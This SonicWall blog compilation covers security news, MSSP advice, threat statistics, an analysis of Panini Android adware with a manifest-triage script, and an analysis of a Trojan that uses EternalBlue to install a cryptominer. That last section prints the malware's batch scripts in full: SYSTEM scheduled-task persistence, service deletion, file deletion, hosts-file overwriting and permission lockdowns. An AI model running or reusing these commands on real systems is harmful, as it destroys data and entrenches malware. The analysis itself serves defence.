Cyber Security News & Trends

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.


SonicWall Spotlight

10 Security Advances That Could Change the Game – Channel Partners Online

  • SonicWall’s Lawrence Pingree shares his perspective on the need for rapid chip augmentation in order to successfully combat the cybersecurity war in 2019.

SonicWall and Partners Take Part at GITEX Technology Week – Tahawul Tech

  • SonicWall is a major presence at GITEX Technology Week, one of the biggest technology events in the world.

How Cyberhardening Can Reduce Risk to the Entire Medical Community – Beckers Hospital Review

  • Data from SonicWall’s Capture Labs is used to help show just how much data in the medical industry is vulnerable to cyberattack.

Cyber Security News

Facebook Finds Hack Was Done by Spammers, Not Foreign State – The Wall Street Journal

  • Facebook thinks that spammers looking to make money through advertising, and not a nation-state, are responsible for a recent data breach involving the data of 30 million accounts.

The Mysterious Return of Years-Old Chinese Malware – Wired

  • A modified version of malware dating back to 2010, that has never been made public and is not known to have been sold on the black market, has had a mysterious resurgence in recent months.

Pentagon Discloses Card Breach – ZDNet

  • Only a week after reporting that it was struggling to meet the demands of cyberwarfare, the Pentagon confirms that a security breach affecting up to 30,000 personnel was discovered at the start of October this year.

UK Firms “Not Prepared” for Data Breaches – Tech Radar

  • It’s not just U.K. firms. According to a report released for European Cybersecurity Month, one in six European businesses is not prepared for a cyberattack, even though over a third of them have suffered a data breach in the past year.

Zero-Days, Fileless Attacks Are Now the Most Dangerous Threats to the Enterprise – ZDNet

  • According to a study conducted by the Ponemon Institute, the average cost of a successful endpoint-based attack has increased by roughly 42 percent year-on-year with the average organization losing over $7 million.

New Cyberdefenses to Protect Your Smart Appliances From Hackers – The Wall Street Journal

  • A partnership was announced between U.K.-based chip designer Arm and Boston-based cybersecurity firm Cybereason; they aim to develop secure chip designs specifically protecting Internet of Things (IoT) devices from cyberattack.

Report: Cryptocurrency Exchanges Lost $882 Million to Hackers – Bank Info Security

  • Cryptocurrency exchanges continue to suffer successful cyberattacks, and a newly released study has tallied the damages at $882 million over the past two years; this is only expected to get worse in 2019.

In Case You Missed It

3 Elements of a Successful Managed Security Services (MSS) Bundle

The small- and medium-sized business (SMB) market is rapidly accelerating its adoption of converged managed IT services to alleviate headaches and prevent risks.

More and more businesses use cloud-based services for enterprise applications, processing or communications, placing an even higher priority on network performance and reliability. Yet many SMBs are facing a cybersecurity crisis.

Cyber threats continue to get more sophisticated and frequent, and SMBs are becoming a more routine target: 61 percent of SMBs experienced a cyber breach in 2017, compared to 55 percent in 2016.

Most managed IT service providers recognize that SMBs don’t have the awareness, knowledge or resources to implement cyber defense mechanisms to effectively protect their data, devices and people. Furthermore, the cybersecurity services market has developed enterprise-class solutions aimed at large enterprise businesses because they have historically been prime targets.

“The challenge for MSPs is finding effective tools that pair well with internal processes to mitigate the risk of a cyber breach, threat of downtime or damage to customers’ reputation.”

There are incredible opportunities for MSPs to develop service options customized for SMBs to address cybersecurity woes while accommodating limited budgets. MSPs that are focused on this will continue to add real value to the services they are providing and strengthen customer relationships by building trust.

The challenge for MSPs is finding effective tools that pair well with internal processes to mitigate the risk of a cyber breach, threat of downtime or damage to customers’ reputation. If bundled intelligently, these services are an easy sell. No business owner wants to see their organization featured on the six o’clock news for a data breach.

Consider three foundational elements of an MSSP plan. These may consist of several individual services, but those services are aimed at protecting specific functions.

Data Protection

Just like their enterprise counterparts, small businesses have a growing data footprint. Storage keeps getting less expensive and many SMBs don’t have a data governance policy, causing the gigabytes to pile up.

Whether the data is stored on-premises or in the cloud, it’s important to have appropriate protections in place, but also the ability to restore data in the event of a disaster or cyberattack. Good MSSP bundles aimed at protecting data will include:

  • Content Filtering: Having a web filtering service to block inappropriate, unproductive or malicious websites is a major first step in preventing cyberattacks.
  • Email Security: Implement secure email solutions to protect SMBs from email-borne threats, such as ransomware, zero-day attacks and spear-phishing attempts, and comply with regulatory mandates to encrypt sensitive emails.
  • Backup & Disaster Recovery: Ensure that an SMB’s data is effectively backed up, whether it lives on a workstation, an on-premises device or in the cloud. Being able to restore information that has been compromised is the best insurance policy.

Device Protection

Endpoint devices come in all shapes, sizes and flavors, but the quantity of devices continues to grow. This means that there are more potential intrusion points than ever before. It’s important for a good MSSP bundle to include services aimed at protecting and monitoring endpoint devices.

  • Endpoint Management: MSSPs should have a comprehensive inventory of all devices associated with an SMB customer. Good endpoint management solutions will allow MSSPs to push updates and security patches as they are released to ensure that endpoints stay hardened.
  • Endpoint Security: It almost goes without saying, but having a solid antivirus endpoint security solution in place is still one of the best defenses for protecting endpoint devices.
  • Endpoint Rollback: Mistakes happen. Phishing emails are opened. Malicious links are clicked. But MSSPs can add value for their customers by using endpoint protection solutions that include automated rollback features for those events when a device is compromised.

People Protection

The human element is the most difficult to control and the hardest to protect. But it is critical.

Provide convenient and easy pathways for people to adopt sound security behavior. A consistent security awareness culture makes it easier for users to be aware of security threats. Consider the following bundled services as part of your MSSP offering.

  • Virtual Private Network (VPN): Provide a secure lane for all SMB endpoints to work over a VPN connection. A VPN client may route back to the customer’s network if there are on-premises connectivity demands, or it may be a more generic VPN connection to an MSSP’s gateway. VPNs are prevalent and not just for workstations anymore. Modern VPN services offer clients for just about any type of endpoint and are especially important for mobile devices.
  • Policies & Procedures: Provide template policies and procedures to your SMB customers. Again, many of them are leaving IT management, including governance, up to you. Providing basic templates for things like password management, backup and user provisioning is an easy way to get them to create a more robust security awareness culture.
  • Security Awareness Training: For SMBs that subscribe to your MSSP bundle, provide them with routine threat awareness and simple tips and tricks to enforce that security awareness culture.

The most effective MSSP program depends on partnerships: partnerships between SMBs and their IT partners, but also between MSSP providers and solutions providers. MSPs that bundle services to offer an MSSP will be well-suited to work with security vendors able to offer a comprehensive spectrum of services for their SMB customers.

About ProviNET

ProviNET is a SonicWall SecureFirst Gold Partner. For nearly three decades, ProviNET has delivered trusted technology solutions for healthcare organizations. Whether it’s a single project or full-time onsite work, ProviNET designs and implements customized solutions so healthcare organizations can focus on core services.

ProviNET’s tight-knit group of experienced, industry-certified personnel are focused on customer satisfaction. They are a reputable organization, fulfilling immediate IT needs and helping plan for tomorrow. They are ready to put their extensive knowledge to work for healthcare, developing strategies and solving challenges with the latest technology.

To learn more about ProviNET, please visit www.provinet.com.

September 2018 Cyber Threat Data: Ransomware Threats Double Monthly, Encrypted Threats Still Growing

We’re into October and based on this year’s reports so far, the threat landscape is continuing to evolve and change as the global cyber arms race grows.

Phishing attacks continue to trend downwards, with September data showing the volume of attacks down 92 percent compared to the same time last year. The reasons for this decline are not 100 percent clear, but may be partly attributed to increased awareness as people are becoming more adept at identifying phony websites and sharing information about common scams.

While phishing is still a threat, particularly as the holiday season approaches, it appears that cyber criminals are continuing to favor attacks involving malware, ransomware, TLS/SSL encrypted attacks and intrusion attempts. The SonicWall Capture Advanced Threat Protection sandbox, with Real-Time Deep Memory Inspection (RTDMI™), has discovered 27,680 new attack variants this year, further evidence that cyber criminals are pursuing more sophisticated and coordinated methods of attack.

Globally, the SonicWall Capture Threat Network, which includes more than 1 million sensors across the world, recorded the following 2018 year-to-date attack data through September 2018:

  • 8.5 billion malware attacks (54 percent increase from 2017)
  • 2.9 trillion intrusion attempts (49 percent increase)
  • 262.4 million ransomware attacks (108 percent increase)
  • 1.9 million encrypted threats (56 percent increase)

In September 2018 alone, the average SonicWall customer faced:

  • 1,662 malware attacks (24 percent decrease from July 2017)
  • 791,015 intrusion attempts (19 percent increase)
  • 56 ransomware attacks (99 percent increase)
  • 70.9 encrypted threats (61 percent decrease)
  • 10 phishing attacks each day (92 percent decrease)

SonicWall Capture Security Center

SonicWall cyber threat intelligence is available in the SonicWall Security Center, which provides a graphical view of the worldwide attacks over the last 24 hours, countries being attacked and geographic attack origins. This view illustrates the pace and speed of the cyber arms race.

The resource provides actionable cyber threat intelligence to help organizations identify the types of attacks they need to be concerned about, so they can design and test their security posture to ensure their networks, data, applications and customers are properly protected.

Get the Mid-Year Update

Dive into the latest cybersecurity trends and threat intelligence from SonicWall Capture Labs. The mid-year update to the 2018 SonicWall Cyber Threat Report explores how quickly the cyber threat landscape has evolved in just a few months.

Workplace Cybersecurity Is Everyone’s Responsibility

The cyberthreat landscape is changing. An increasing number of cyberattacks are executed using sophisticated tactics. Earlier this year, SonicWall warned that malware volume increased 102 percent in the first half of 2018 compared to that of 2017.

The report also notes a significant increase in cyberattacks that leverage new variants of malware, including ransomware and encrypted threats. Further, attacks are becoming highly targeted, for example baseStriker and PhishPoint target Office 365 users.

Attackers are evolving to take advantage of workplace technology trends, including the cloud and BYOD. These trends empower workforces to be mobile and productive as demanded by today’s 24/7 hyper-connected reality. Unfortunately, these behavior changes are significantly expanding the attack surface area for cybercriminals to exploit.

“Attackers are evolving their tactics to take advantage of workplace technology trends, including the cloud and BYOD.”

Today, network security means more than just safeguarding data, applications and infrastructure. Employees are not only resources that need protection, but also weaknesses or valuable assets for a stronger cybersecurity posture.

It is, of course, essential for organizations to have necessary security in place to monitor and protect attack surface areas. But no security product can be a silver bullet to stop all cyberattacks. It is necessary to educate and empower the last and most crucial line of defense: your employees.

Build a Culture of Cybersecurity Awareness

Employees are a key resource for an organization. As driving revenue is the primary objective, safeguarding the organization must also become one of the main responsibilities for employees. With the right frameworks and security awareness training programs in place, they can also be an effective layer of defense — a human firewall.

By extending these responsibilities to all employees, organizations can prevent sophisticated cyberattacks, saving the organization from financial, legal and reputation damages.

Creating cybersecurity awareness and training programs must include what employees must be aware of, what they need to watch out for, what best practices should be leveraged and how to follow them. It also must be easy to report security incidents. These programs must be delivered efficiently, measured and be easy to use.

Since the cyber threat landscape is evolving, the “human firewall” needs continuous signature/intelligence updates in terms of the new threats and how to identify and stop them. This is modern cybersecurity awareness.

Stop the No. 1 Cyberattack Vector: Email

But cybercriminals also know to target the human element to execute attacks. Email is the No. 1 threat vector used by cybercriminals today; more than 90 percent of attacks start with a phishing campaign.

Modern phishing tactics can trick even the savviest users. Attacks that use fake login pages, impersonation and business email compromise (BEC) are difficult to detect and block as these emails do not contain malware.

Organizations would benefit from taking a human-centric approach to email security and include user training and awareness to spot and avoid clicking on phishing email threats. Organizations should train employees to:

  • Embrace security as one of their key responsibilities.
  • Treat any suspicious email with caution.
  • Look at domain names from suspicious emails.
  • Exercise extra caution if an email is from a free, web-based account.
  • Check for spelling mistakes and grammatical errors.
  • Beware of sudden changes in business practices, for example email requests for transfers of funds.
  • Review the signature and legitimacy of the request.
  • Confirm requests for transfers of funds or confidential information, such as W-2 records.
  • Do not use the “Reply” option to respond to any business emails. Instead, use the “Forward” option and either type in the correct email address or select it from the email address book to ensure the intended recipient’s correct email address is used.

Spot Sophisticated Phishing Attacks

Want to brush up on your ability to spot a phishing attack? Take SonicWall’s quick Phishing IQ test or download our exclusive brief, “How to Stop Email Spoofing.”

Monitor and Manage Shadow IT

According to Gartner, by 2020 one-third of security breaches will be the result of shadow IT. The ease of SaaS adoption and deployment leads to the following problems:

  • Losing control over sensitive corporate data traversing through public or hybrid clouds and data centers introduces new risks such as unauthorized access, malware propagation, data leakage and non-compliance.
  • Balancing security budgets, shadow IT practices and employee productivity.

To address the above challenges, IT administrators need Cloud Access Security Broker (CASB) solutions to provide visibility for what applications are being used and where. This will help them better understand the overall risk posture.

To mitigate the risks of shadow IT and embrace productivity, both organizations and employees must understand the agreement on what constitutes a legitimate application allowed for official use. Employees must be trained to use judgement so that they do not upload sensitive or confidential data into cloud-based applications.

Protect Endpoints, Especially When Outside the Perimeter

Workforces today rely on the same device for business and personal use, resulting in intermingling of business and personal data and applications. This creates an increased risk of security breaches for organizations, including:

  • Unauthorized users gaining access to company data and applications
  • Malware-infected devices acting as conduits to infect company systems
  • Interception of company data in transit on unsecured public Wi-Fi networks
  • Compliance with audit and regulatory requirements
  • Loss of business data stored on devices if rogue personal apps or unauthorized users gain access to data

To ensure proper safety, employees must be educated on the risks an endpoint poses to an organization, especially when those devices are frequently used from home, mobile or public networks. This can start with the basics such as:

  • Lock mobile devices when not in use.
  • Don’t use USB drives you don’t trust.
  • Update all software, operating systems and malware signatures.
  • Use secure VPN connections when accessing corporate resources over unsecured networks.
  • Install next-generation anti-virus (NGAV) to stop the latest threats.

Cybersecurity: Our Shared Responsibility

As cyberattacks evolve, organizations need to take a human-centric approach to security. Cybersecurity is everyone’s job. It’s a shared responsibility. It’s critical that structures, guidelines and processes are in place to make employees care and be responsible to remain safe online while at work.

Organizations will greatly benefit by incorporating user awareness and training programs to educate and empower employees who will form a critical line of defense. Cybersecurity is never finished. Make it core to company culture.


About Cybersecurity Awareness Month

The 15th annual National Cybersecurity Awareness Month (NCSAM) highlights user awareness among consumers, students/academia and business. NCSAM 2018 addresses specific challenges and identifies opportunities for behavioral change. It aims to remind everyone that protecting the internet is “Our Shared Responsibility.”

In addition, NCSAM 2018 will shine a spotlight on the critical need to build a strong, cyber secure workforce to help ensure families, communities, businesses and the country’s infrastructure are better protected through four key themes:

  • Oct. 1-5: Make Your Home a Haven for Online Safety
  • Oct. 8-12: Millions of Rewarding Jobs: Educating for a Career in Cybersecurity
  • Oct. 15-19: It’s Everyone’s Job to Ensure Online Safety at Work
  • Oct. 22-26: Safeguarding the Nation’s Critical Infrastructure

Learn more at StaySafeOnline.org.

Panini Adware for Android soaks network bandwidth, bad news for users with limited data

The SonicWall Capture Labs Threats Research Team has been observing an Android adware that spreads under different app names and icons. This adware does not ask for a plethora of permissions (unlike most malware), and its network activity typically starts after it downloads a jar file a few minutes into execution. Upon further investigation we found more than 500 samples exhibiting this behavior from the last two months alone, indicating that this campaign is very active in the wild. We named this adware campaign Panini after the filename of the jar file that gets downloaded.

Most of these samples use generic and simple app names such as Video, Downloader and Music. We have been tracking samples belonging to this campaign for a while, and below is a chart that shows the breakdown of the different app names used by the samples we analyzed:

 

As visible above, the app names are fairly generic in nature and might have been chosen to keep the adware hidden in the crowd of Android apps with unique and attractive app names.

Birds of the same feather

There are a few similarities among the different samples belonging to this campaign:

Code structure

Below is a comparison of code structure from 3 different samples with different app and package names belonging to the Panini Adware campaign:

List of permissions

All of the samples belonging to this campaign request the following permissions:

  • android.permission.INTERNET
  • android.permission.ACCESS_NETWORK_STATE
  • android.permission.WRITE_EXTERNAL_STORAGE

Similar folder structure from the install location

The folder structure on the device after installation is the same for all the samples from this campaign:

Icons being used

All the samples belonging to this campaign use icons from the following set; these icons are present in every sample in the resource folder mipmap-xxhdpi-v4:

Icon mind games

For apps belonging to this campaign, the icon displayed in the app drawer after installation differs from the one shown before installation.
Example: for the apk com.cradiff.devilfighter (MD5 c43a22306e1f34bd7ed59f5272e2012b), the icon that appears for this apk before installation is:

Post installation the icon visible in the app drawer is different:

Most likely this is because a user who notices a new icon in the app drawer will click on it out of curiosity, to find out when this new app was installed or what it is about. This is a clever tactic that gets the victim to open the app and thereby execute the adware.

We found a folder – mipmap-xxhdpi-v4 – within the resources folder for the apk that contains icons for most of the samples belonging to this campaign:

The icons shown (from the list above) depend on what is coded in the AndroidManifest.xml file:

Once the adware begins execution, the icon disappears from the app drawer. If the victim tries to remove the app from Settings, he sees a different icon than the one that appeared in the app drawer. This is most likely a ploy to confuse the victim when he tries to uninstall the apk:

Permissions

Apps belonging to this campaign request the following permissions:

  • android.permission.INTERNET
  • android.permission.ACCESS_NETWORK_STATE
  • android.permission.WRITE_EXTERNAL_STORAGE

Among these, the only dangerous permission is the request to write to external storage. Malware usually requests a number of normal and dangerous permissions, and from the permissions used we can often infer its behavior. Since the only dangerous permission this adware requests is the ability to write to external storage, we can reasonably assume that some sort of file gets downloaded.
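The icon trick and the three-permission profile described above are both visible in a decoded AndroidManifest.xml, so a triage script can flag them. The following is an added example written for this article, not SonicWall's tooling or code from the write-up: it assumes the binary manifest has already been decoded (e.g. with apktool) and uses constructed sample manifests, not real campaign samples. It relies on documented Android behaviour that the install prompt and Settings show the application icon while the app drawer shows a launcher activity's own android:icon when one is set.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
# Traits taken from the Panini write-up above.
PANINI_PERMISSIONS = frozenset({
    "android.permission.INTERNET",
    "android.permission.ACCESS_NETWORK_STATE",
    "android.permission.WRITE_EXTERNAL_STORAGE",
})
GENERIC_LABELS = frozenset({"video", "downloader", "music"})


def _attr(element, name):
    """Read an android:-namespaced attribute, or None if absent."""
    return element.get("{%s}%s" % (ANDROID_NS, name))


def _is_launcher(component):
    """True if an <activity>/<activity-alias> has a MAIN + LAUNCHER intent filter."""
    for intent_filter in component.findall("intent-filter"):
        actions = {_attr(a, "name") for a in intent_filter.findall("action")}
        categories = {_attr(c, "name") for c in intent_filter.findall("category")}
        if ("android.intent.action.MAIN" in actions
                and "android.intent.category.LAUNCHER" in categories):
            return True
    return False


def triage_manifest(manifest_xml):
    """Check a decoded AndroidManifest.xml against the Panini traits (2+ hits: panini-like)."""
    root = ET.fromstring(manifest_xml.strip())
    permissions = sorted(
        _attr(p, "name") for p in root.findall("uses-permission") if _attr(p, "name"))
    exact_permission_set = set(permissions) == PANINI_PERMISSIONS

    app = root.find("application")
    app_icon = _attr(app, "icon") if app is not None else None
    app_label = _attr(app, "label") if app is not None else None

    # Install prompt and Settings show the <application> icon; the app drawer
    # shows the launcher component's own android:icon when it sets one. A
    # differing launcher icon is the "new icon after install" trick described above.
    launcher = None
    if app is not None:
        launcher = next((c for tag in ("activity", "activity-alias")
                         for c in app.findall(tag) if _is_launcher(c)), None)
    launcher_icon = (_attr(launcher, "icon") or app_icon) if launcher is not None else None
    icon_mismatch = bool(app_icon and launcher_icon and launcher_icon != app_icon)

    # Labels given as resource references (@string/...) resolve elsewhere in the
    # APK, so only literal labels are compared against the campaign's generic names.
    literal_label = app_label if app_label and not app_label.startswith("@") else None
    generic_label = bool(literal_label) and literal_label.strip().lower() in GENERIC_LABELS

    hits = int(exact_permission_set) + int(icon_mismatch) + int(generic_label)
    verdict = "panini-like" if hits >= 2 else ("review" if hits == 1 else "no-match")
    return {
        "package": root.get("package"),
        "permissions": permissions,
        "exact_permission_set": exact_permission_set,
        "application_icon": app_icon,
        "launcher_icon": launcher_icon,
        "icon_mismatch": icon_mismatch,
        "generic_label": generic_label,
        "hits": hits,
        "verdict": verdict,
    }


# Constructed manifest modelled on the traits described above; not a real sample.
SUSPECT_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.constructed.video">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
  <application android:label="Video" android:icon="@mipmap/ic_launcher">
    <activity android:name=".MainActivity" android:icon="@mipmap/ic_drawer">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>
"""

# Constructed contrast case: different permission mix, one icon, resource label.
BENIGN_MANIFEST = (
    SUSPECT_MANIFEST
    .replace("constructed.video", "constructed.notes")
    .replace("android.permission.WRITE_EXTERNAL_STORAGE", "android.permission.CAMERA")
    .replace('android:label="Video"', 'android:label="@string/app_name"')
    .replace(' android:icon="@mipmap/ic_drawer"', "")
)

if __name__ == "__main__":
    for manifest in (SUSPECT_MANIFEST, BENIGN_MANIFEST):
        print(triage_manifest(manifest)["package"], triage_manifest(manifest)["verdict"])
```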

That is exactly what happens once the adware begins execution.

After a few minutes of execution, the adware issues a GET request for a jar file named romanticpanini [blocked by GAV: JScript.A_161 (Trojan)]:

The Panini

The file romanticpanini is saved locally in the folder app_extra:

Once the jar file is saved, network activity on the device multiplies and heavy advertisement-related traffic appears; soon enough, full-screen advertisements popped up regularly on our infected device:

We measured network traffic under different test conditions and observed a sharp rise in traffic originating from the adware samples. Each test ran for 10 minutes after an adware sample was installed and executed on the device.

On average we saw data consumption of close to 5MB post infection (as shown in the image below). This does not bode well for users who have limited/capped data plans on their devices as additional data consumption leads to extra charges on the mobile phone bill.

Adware Domains

Every sample from this campaign contains a hardcoded domain. A few of the domains we encountered during our analysis of Panini adware are:


A VirusTotal URL scan of one of the domains, cdn.mobengine.xyz, revealed another jar file hosted on this domain alongside romanticpanini: stealmaggot4.jar:

The image above additionally shows different apps that harbor this campaign.

Distribution

The apps belonging to this campaign use different package and app names; among the samples we observed over the last few weeks, a few package names repeated a number of times. A quick search on the Android malware collaboration portal Koodous returns a high number of samples from this campaign; the image below shows the number of results for apps with a particular package name:

 

The image below shows the geographical distribution of hits for the signatures belonging to this campaign:

 

Conclusion

Traditionally, adware has fallen into a grey area when it comes to calling it malicious or blocking it. Most of the time it does not pose a risk to the user’s data and privacy like traditional malware, but is more of a ‘nuisance’ when it pops full-screen ads and/or consumes large amounts of data. The Panini adware campaign falls under the same umbrella: it poses a risk in terms of data consumption. This particularly hits users on a mobile plan with restricted data limits, but users with unlimited data plans are affected as well, since data speeds are usually reduced once a particular limit is reached.

It is a good habit to routinely check network data consumption on our devices. A routine check with a network monitoring app can show whether a particular app is consuming a lot of network data and can potentially uncover adware on the device.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: AndroidOS.Panini.AD (Trojan)
  • GAV: AndroidOS.Panini.AD_2 (Trojan)
  • GAV: JScript.A_161 (Trojan)

Below are a few samples belonging to this campaign:


Protecting Your MSSP Reputation with Behavior-Based Security

You’ve been here before. Your customer gets hit by a cyberattack and they ask, “Why did this happen? Shouldn’t your managed security service have protected us?”

Unless you give them a satisfactory answer, they may be shopping for a new partner. Over the past few years, I’ve heard several MSSPs having to explain to their customers that the malware or ransomware attack could not be stopped because they didn’t possess the technology that could mitigate new attacks.

Don’t put yourself in a situation where you can’t properly safeguard your customers — even against new or unknown attacks. To protect both your customers and your reputation against the latest threats, you need to deploy behavior-based security solutions that can better future-proof your customer environment.

The Logistics of Threat Prevention

When talking with people about threat prevention I ask, “How many new forms of malware do you think SonicWall detected last year?”

I usually hear answers in the thousands. The real answer? 56 million new forms or variants of malware in a single year. That’s more than 150,000 a day. Every day, security companies like SonicWall have teams of people creating signatures to help build in protections, but this takes time. Despite the industry’s best effort, static forms of threat elimination are limited.

Layering Security Across Customer Environments

MSSPs understand the importance of selling perimeter security, such as firewalls and email security, to scrub out most threats. These solutions will cover roughly 94-98 percent of threats. But for the smaller percentage of threats that are no less devastating, this is where behavior-based solutions come into play.

On each edge-facing firewall and email security service you need to have a network sandbox, which is an isolated environment where files can be tested to understand their intended purpose or motive. For example, the SonicWall Capture Advanced Threat Protection (ATP) sandbox is an isolated environment that is designed to run suspicious files in parallel through multiple engines to resist evasive malware. With the ability to block a file until a verdict has been reached, you can ensure that you will deliver highly vetted and clean traffic to end users.

Endpoints require a form of security that continuously monitors the system for malicious behavior, because they roam outside the network perimeter and encounter fileless threats from vectors like malvertising.

SonicWall’s endpoint security solution (called Capture Client) only uses roughly 1 percent of the CPU’s processing power on a standard laptop. It can stop attacks before they happen as well as halt attacks as they execute. MSSPs love the ability to prevent dynamic attacks but also roll them back (on Windows only) in case they do initiate.

Behavior-based Security in Action

The power of behavior-based security was clear with the initial WannaCry attack in 2017. It was made famous when 16 NHS hospitals in the UK were shut down due to this viral ransomware attack. These sites were protected by a competitor whose CEO had to explain himself and apologize on national television.

The sites protected by SonicWall were up and running and helped pick up the slack when the others went down. Three weeks before the attack, SonicWall put protections in place that prevented Version 1 of WannaCry and its SMB vulnerability exploit from working.

But it was the behavior-based security controls that helped to identify and stop all the subsequent versions that came after. This same pattern emerged again with the NotPetya and SamSam ransomware attacks; static defenses followed by proactive dynamic defenses.

Furthermore, SonicWall’s reporting enables MSSPs to be alerted when something has been stopped. SonicWall Capture Client attack visualization gives administrators a view of where the threat came from and what it wanted to do on the endpoint.

This approach gives our customers, and the MSSPs powered by SonicWall, protection against the threats SonicWall has already catalogued, and it also protects against attacks that shift and change to bypass those safeguards. By doing our best to build protections in a timely manner, as well as providing technology that detects and stops unknown attacks, we protect your customers as well as your reputation.


This story originally appeared on MSSP Alert and was republished with permission.

Trojan uses EternalBlue to install cryptominer

Interest in cryptocurrencies has not wavered despite a period of sinking market values. Cybercriminals are still ramping up efforts to obtain blockchain assets in the hope that their values will spike again in the future. While ransomware is still around, we have observed that cryptocurrency mining is increasingly favored by cybercriminals as a method of choice for obtaining these cryptocurrencies. The premise is fairly simple: a machine gets infected by malware, which stealthily uses its processing power to mine cryptocurrency.

This week, the SonicWall Capture Labs Threat Research team has come across another Trojan that uses the leaked NSA exploit, EternalBlue, to install a cryptominer. This cryptominer even kills other known cryptomining processes that might be running on the victim’s machine to ensure exclusivity of the mining resource.

Infection Cycle:

The main installer uses an icon imitating a Chinese security product from 360.cn (icon not reproduced here).

Upon execution, it creates a directory named “IIS” within the %Windir% folder and drops several files, including a suite of the leaked NSA exploit tools:

  • %Windir%\IIS\CPUInfo.exe
  • %Windir%\IIS\Doublepulsar-1.3.1.exe
  • %Windir%\IIS\Esteemaudit-2.1.0.exe
  • %Windir%\IIS\Esteemaudittouch-2.1.0.exe
  • %Windir%\IIS\Eternalblue-2.2.0.exe
  • %Windir%\IIS\Eternalchampion-2.0.0.exe
  • %Windir%\IIS\free.bat
  • %Windir%\IIS\demo.bat
  • %Windir%\IIS\demc.bat
  • %Windir%\IIS\x86.dll
  • %Windir%\IIS\x64.dll

CPUInfo.exe carries its own icon (not reproduced here). It determines whether the machine is vulnerable, runs the appropriate exploit tool and then installs either x86.dll or x64.dll, depending on the processor architecture.

To ensure persistence, Demo.bat is executed. It sets the Task Scheduler service to start automatically and starts it, then registers two scheduled tasks that run as SYSTEM: “RavTask”, which runs free.bat every 240 minutes, and “GooglePinginConfigs”, which runs CPUInfo.exe at system start. The corresponding .job files are marked system and hidden, RavTask is started immediately, and the batch file deletes itself.


sc config Schedule start= auto
sc start Schedule
schtasks /delete /tn RavTask /f
schtasks /delete /tn GooglePinginConfigs /f
@schtasks /create /sc minute /mo 240 /tn "RavTask" /tr "C:\windows\IIS\free.bat" /ru "system" /f
@schtasks /create /tn "GooglePinginConfigs" /tr "C:\windows\IIS\CPUInfo.exe" /sc onstart /ru "system" /f
@C:\Windows\System32\attrib +s +h C:\WINDOWS\Tasks\RavTask.job
@C:\Windows\System32\attrib +s +h C:\WINDOWS\Tasks\GooglePinginConfigs.job
schtasks /run /tn "RavTask"
del %0

Demc.bat is then executed. It terminates known (possibly rival) cryptominers and performs a slew of other actions to take sole control of the machine, including:

  • Terminating ftp.exe, taking ownership of it, deleting it and replacing it with a hidden, access-denied directory of the same name
  • Deleting the hosts file and replacing it with one containing only “127.0.0.1 localhost”
  • Clearing the DNS cache
  • Stopping and deleting services
  • Deleting all EXE files under %ProgramData% and creating hidden, access-denied directories with the names of rival executables (for example c:\wax.exe and %SystemRoot%\svchost.exe) so that no file of that name can be written there
  • Removing Image File Execution Options (IFEO) entries for smss.exe, svchost.exe, sc.exe and schtasks.exe, then registering taskkill.exe as the IFEO “debugger” for rival image names such as wax.exe, svchostr.exe and csrss..exe; Windows launches the registered debugger in place of the image, so those programs can no longer start

@wmic process where "name='server.exe' and ExecutablePath='C:\\program files (x86)\\stormii\\server.exe'" call Terminate
@md "C:\program files (x86)\stormii\server.exe"
echo y|cacls "C:\program files (x86)\stormii\server.exe" /d everyone
attrib +s +h +r +a "C:\program files (x86)\stormii"
echo y|cacls "C:\program files (x86)\stormii" /d everyone
@wmic process where "name='conhost.exe' and ExecutablePath='C:\\program files (x86)\\windows nt\\conhost.exe'" call Terminate
@del /s /q "C:\program files (x86)\windows nt\conhost.exe"
@sc delete SuperProServerST
taskkill /f /t /im ftp.exe
takeown /f %SystemRoot%\SysWOW64\ftp.exe /a
takeown /f %SystemRoot%\System32\ftp.exe /a
echo y|cacls %SystemRoot%\System32\ftp.exe /g users:f
echo y|cacls %SystemRoot%\SysWOW64\ftp.exe /g users:f
del %SystemRoot%\System32\ftp.exe
del %SystemRoot%\SysWOW64\ftp.exe
md %SystemRoot%\SysWOW64\ftp.exe
attrib +s +h +r %SystemRoot%\SysWOW64\ftp.exe
attrib +s +h +r %SystemRoot%\System32\ftp.exe
echo y|cacls %SystemRoot%\SysWOW64\ftp.exe /d everyone
echo y|cacls %SystemRoot%\System32\ftp.exe /d everyone
takeown /f %systemroot%\system32\Drivers\etc\hosts /a
echo y|cacls %systemroot%\system32\Drivers\etc\hosts /g users:f
attrib -s -h -a -r %systemroot%\system32\Drivers\etc\hosts
del /s /q %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 localhost>>%systemroot%\system32\drivers\etc\hosts
attrib +s +h +a +r %systemroot%\system32\Drivers\etc\hosts
@ipconfig /flushdns
@attrib -h -r -s -a C:\ProgramData
taskkill /f /t /im CPUInfo.exe
taskkill /f /t /im up.exe
taskkill /f /t /im block.exe
taskkill /f /t /im cpu.exe
@taskkill /f /t /im svshostr.exe
@sc stop xtfya
@sc delete xtfya
@sc stop "Network Support"
@sc delete "Network Support"
@sc stop "HomeGroup Support"
@sc delete "HomeGroup Support"
@sc stop xtfy
@sc delete xtfy
@sc stop Natioanl
@sc delete Natioanl
@sc stop Natihial
@sc delete Natihial
@sc stop "Interactive Services Detection Report"
@sc delete "Interactive Services Detection Report"
@sc stop "mssecsvc2.0"
@sc delete "mssecsvc2.0"
@sc stop "mssecsvc2.1"
@sc delete "mssecsvc2.1"
@sc stop ServiceMais
@sc delete ServiceMais
@sc stop ServiceMaims
@sc delete ServiceMaims
del /f /s /q %ProgramData%\*.exe
rd /s /q %ProgramData%\dll
md %ProgramData%\dll
attrib +s +h +r %ProgramData%\dll
echo y|cacls %ProgramData%\dll /d everyone
del /f /s /q C:\Progra~1\dll
md C:\Progra~1\dll
attrib +s +h +r C:\Progra~1\dll
echo y|cacls C:\Progra~1\dll /d everyone
md c:\wax.exe
attrib +s +h +r c:\wax.exe
